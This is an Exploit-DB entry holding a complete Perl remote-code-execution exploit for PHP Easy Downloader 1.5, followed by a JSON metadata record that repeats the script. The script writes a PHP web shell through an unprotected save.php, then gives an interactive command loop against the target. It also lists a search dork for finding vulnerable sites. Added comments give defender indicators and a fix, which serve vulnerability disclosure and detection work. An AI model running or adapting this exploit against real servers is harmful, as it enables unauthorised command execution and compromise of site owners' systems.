ID EDB-ID:2812
Type exploitdb
Reporter nuffsaid
Modified 2006-11-18T00:00:00
Description
PHP Easy Downloader <= 1.5 (save.php) Remote Code Execution Exploit. Webapps exploit for php platform
#!/usr/bin/perl
# +-------------------------------------------------------------------------------------------
# + PHP Easy Download <= 1.5 Remote Code Execution Vulnerability
# +-------------------------------------------------------------------------------------------
# + Affected Software .: PHP Easy Download <= 1.5
# + Vendor ............: http://www.ironclad.net/
# + Download ..........: http://ironclad.net/scripts/PHP_Easy_Download.zip
# + Description .......: "PHP Easy Download is an easy to use and convenient download script"
# + Dork ..............: "PHP Easy Downloader"
# + Class .............: Remote Code Execution
# + Risk ..............: High (Remote Code Execution)
# + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
# +-------------------------------------------------------------------------------------------
# + Details:
# + In a default installation, PHP Easy Download does not prevent clients from accessing the
# + files in the file_info/admin directory. The file_info/admin/save.php file takes input
# + passed to the script via $_POST and writes it, unsanitized, to a file named
# + $_POST["filename"].0 in the file_info/descriptions directory (see line 20 below).
# +
# + Vulnerable Code:
# + file_info/admin/save.php, line(s) 14-36:
# + -> 14: $filename = $_POST["filename"];
# + -> 15: $description = $_POST["description"];
# + -> 20: $path = "../descriptions/$filename.0";
# + -> 30: $content = "$accesses|$description|$moreinfo|$date";
# + -> 34: $newfile = fopen($path,"w");
# + -> 35: fwrite($newfile, $content);
# + -> 36: fclose($newfile);
# +
# + Solution:
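# + Prevent users from accessing any of the files in the file_info directory (htaccess).
# + This is an access-control workaround: the save.php lines quoted above still write
# + request data to disk without validating it, so input validation in the script itself
# + is also needed.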
# +-------------------------------------------------------------------------------------------
use Getopt::Long;
use URI::Escape;
use IO::Socket;
# PHP snippet that main() places in the `moreinfo` form field of the POST to
# save.php. It hands the `cmd` query parameter to passthru().
# Defender note: a file under the descriptions directory whose content
# includes this string is an indicator that the write in save.php was abused.
$code = "<?php passthru(\$_GET[cmd]); ?>";
# Script entry point; main() and usage() are defined below.
main();
# Print the command-line help text to STDOUT and terminate the script.
# Called by main() when no host option was supplied.
sub usage
{
    # Same four lines, emitted in one print call.
    print "\nPHP Easy Download <= 1.5 Remote Code Execution Exploit\n",
          "-h, --host\ttarget host\t(example.com)\n",
          "-f, --file\tshell file\t(shell.php)\n",
          "-d, --dir\tinstall dir\t(/file_info)\n";
    exit;
}
# Drives the two request stages of this proof of concept:
#   1. one POST to <dir>/admin/save.php carrying $code in the `moreinfo` field,
#   2. a loop that reads lines from STDIN and sends each one as the `cmd` query
#      parameter of a GET to <dir>/descriptions/<file>.0.
# All variables are package globals (the script has no `use strict`).
#
# Defender notes (what these requests look like in logs and on disk):
#   - a POST to */admin/save.php followed by GETs to */descriptions/*.0?cmd=...
#     from the same client;
#   - neither request carries a User-Agent header, and header lines end in a
#     bare "\n" rather than CRLF;
#   - everything goes to port 80 over plain TCP, so the bodies are visible to
#     network inspection;
#   - the written file is named <file>.0 (default "shell.php.0"). Whether the
#     server runs such a file as PHP depends on its handler configuration,
#     which this page does not show; disabling script execution in the
#     descriptions directory removes the second stage.
sub main
{
# -h/--host is mandatory; -f/--file and -d/--dir fall back to defaults below.
GetOptions ('h|host=s' => \$host,'f|file=s' => \$file,'d|dir=s' => \$dir);
usage() unless $host;
$dir = "/file_info" unless $dir;
$file = "shell.php" unless $file;
# NOTE(review): the return value is discarded and $cmd has not been assigned
# yet, so this call has no visible effect.
uri_escape($cmd);
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die "\nconnect() failed.\n";
print "\nconnected to ".$host.", sending data.\n";
# The form body is built by plain concatenation: $code and $file are inserted
# as-is, so the literal "<?php passthru(" text appears in the request body.
$sendurl = "description=0&moreinfo=".$code."&accesses=0&filename=".$file."&date=&B1=Submit";
$sendlen = length($sendurl);
# Request is hand-written onto the socket; no cookie or credential is sent.
print $sock "POST ".$dir."/admin/save.php HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Connection: close\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$sendlen."\n\n";
print $sock $sendurl;
print "attempted to create php shell, server response:\n\n";
# Echo the raw server response; the script does not check the status code.
while($recvd = <$sock>)
{
print " ".$recvd."";
}
# Interactive stage: the string "~quit" is used as a pattern, so any input
# line containing it ends the loop.
while($cmd !~ "~quit")
{
print "\n\n-> ";
$cmd = <STDIN>;
if ($cmd !~ "~quit")
{
# A new connection is opened per line ("Connection: close" is sent each time).
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die "connect() failed.\n";
# The input line is not chomped, so its trailing newline is percent-encoded
# too; logged query strings from this script are expected to end in %0A.
$sendurl = uri_escape($cmd);
print $sock "GET ".$dir."/descriptions/".$file.".0?cmd=".$sendurl." HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";
print "\n";
# Print the full HTTP response (headers and body) unchanged.
while($recvd = <$sock>)
{
print $recvd;
}
}
}
exit;
}
# milw0rm.com [2006-11-18]
{"id": "EDB-ID:2812", "hash": "6cc8bb696eb9ac669978a463736bd4cb", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP Easy Downloader <= 1.5 save.php Remote Code Execution Exploit", "description": "PHP Easy Downloader <= 1.5 (save.php) Remote Code Execution Exploit. Webapps exploit for php platform", "published": "2006-11-18T00:00:00", "modified": "2006-11-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/2812/", "reporter": "nuffsaid", "references": [], "cvelist": [], "lastseen": "2016-01-31T17:05:36", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-01-31T17:05:36"}, "vulnersScore": 6.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2812/", "sourceData": "#!/usr/bin/perl\n# +-------------------------------------------------------------------------------------------\n# + PHP Easy Download <= 1.5 Remote Code Execution Vulnerability\n# +-------------------------------------------------------------------------------------------\n# + Affected Software .: PHP Easy Download <= 1.5\n# + Vendor ............: http://www.ironclad.net/\n# + Download ..........: http://ironclad.net/scripts/PHP_Easy_Download.zip\n# + Description .......: \"PHP Easy Download is an easy to use and convenient download script\"\n# + Dork ..............: \"PHP Easy Downloader\"\n# + Class .............: Remote Code Execution\n# + Risk ..............: High (Remote Code Execution)\n# + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>\n# +-------------------------------------------------------------------------------------------\n# + Details:\n# + PHP Easy Download by default installation doesn't prevent any of the files in the\n# + file_info/admin directory from being accessed by a client. 
The file_info/admin/save.php\n# + file takes input passed to the script by $_POST and writes it to $_POST[\"filename\"].0\n# + unsanatized in the file_info/admin/descriptions directory.\n# +\n# + Vulnerable Code: \n# + file_info/admin/save.php, line(s) 14-36:\n# + -> 14: $filename = $_POST[\"filename\"];\n# + -> 15: $description = $_POST[\"description\"];\n# + -> 20: $path = \"../descriptions/$filename.0\";\n# + -> 30: $content = \"$accesses|$description|$moreinfo|$date\";\n# + -> 34: $newfile = fopen($path,\"w\");\n# + -> 35: fwrite($newfile, $content);\n# + -> 36: fclose($newfile);\n# + \n# + Solution:\n# + Prevent users from accessing any of the files in the file_info directory (htaccess).\n# +-------------------------------------------------------------------------------------------\n\nuse Getopt::Long;\nuse URI::Escape;\nuse IO::Socket;\n\n$code = \"<?php passthru(\\$_GET[cmd]); ?>\";\n\nmain();\n\nsub usage\n{\n print \"\\nPHP Easy Download <= 1.5 Remote Code Execution Exploit\\n\";\n print \"-h, --host\\ttarget host\\t(example.com)\\n\";\n print \"-f, --file\\tshell file\\t(shell.php)\\n\";\n print \"-d, --dir\\tinstall dir\\t(/file_info)\\n\";\n exit;\n}\n\nsub main\n{\n GetOptions ('h|host=s' => \\$host,'f|file=s' => \\$file,'d|dir=s' => \\$dir);\n usage() unless $host;\n \n $dir = \"/file_info\" unless $dir;\n $file = \"shell.php\" unless $file;\n uri_escape($cmd);\n $sock = IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>\"$host\",PeerPort=>\"80\")\n or die \"\\nconnect() failed.\\n\";\n \n print \"\\nconnected to \".$host.\", sending data.\\n\";\n $sendurl = \"description=0&moreinfo=\".$code.\"&accesses=0&filename=\".$file.\"&date=&B1=Submit\";\n $sendlen = length($sendurl);\n print $sock \"POST \".$dir.\"/admin/save.php HTTP/1.1\\n\";\n print $sock \"Host: \".$host.\"\\n\";\n print $sock \"Connection: close\\n\";\n print $sock \"Content-Type: application/x-www-form-urlencoded\\n\";\n print $sock \"Content-Length: \".$sendlen.\"\\n\\n\";\n print $sock 
$sendurl;\n print \"attempted to create php shell, server response:\\n\\n\";\n while($recvd = <$sock>)\n {\n print \" \".$recvd.\"\";\n }\n \n while($cmd !~ \"~quit\")\n {\n print \"\\n\\n-> \";\n $cmd = <STDIN>;\n if ($cmd !~ \"~quit\")\n {\n $sock = IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>\"$host\",PeerPort=>\"80\")\n or die \"connect() failed.\\n\";\n $sendurl = uri_escape($cmd);\n \n print $sock \"GET \".$dir.\"/descriptions/\".$file.\".0?cmd=\".$sendurl.\" HTTP/1.1\\n\";\n print $sock \"Host: \".$host.\"\\n\";\n print $sock \"Accept: */*\\n\";\n print $sock \"Connection: close\\n\\n\";\n print \"\\n\";\n \n while($recvd = <$sock>)\n {\n print $recvd;\n }\n }\n }\n exit;\n}\n\n# milw0rm.com [2006-11-18]\n", "osvdbidlist": ["30525"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}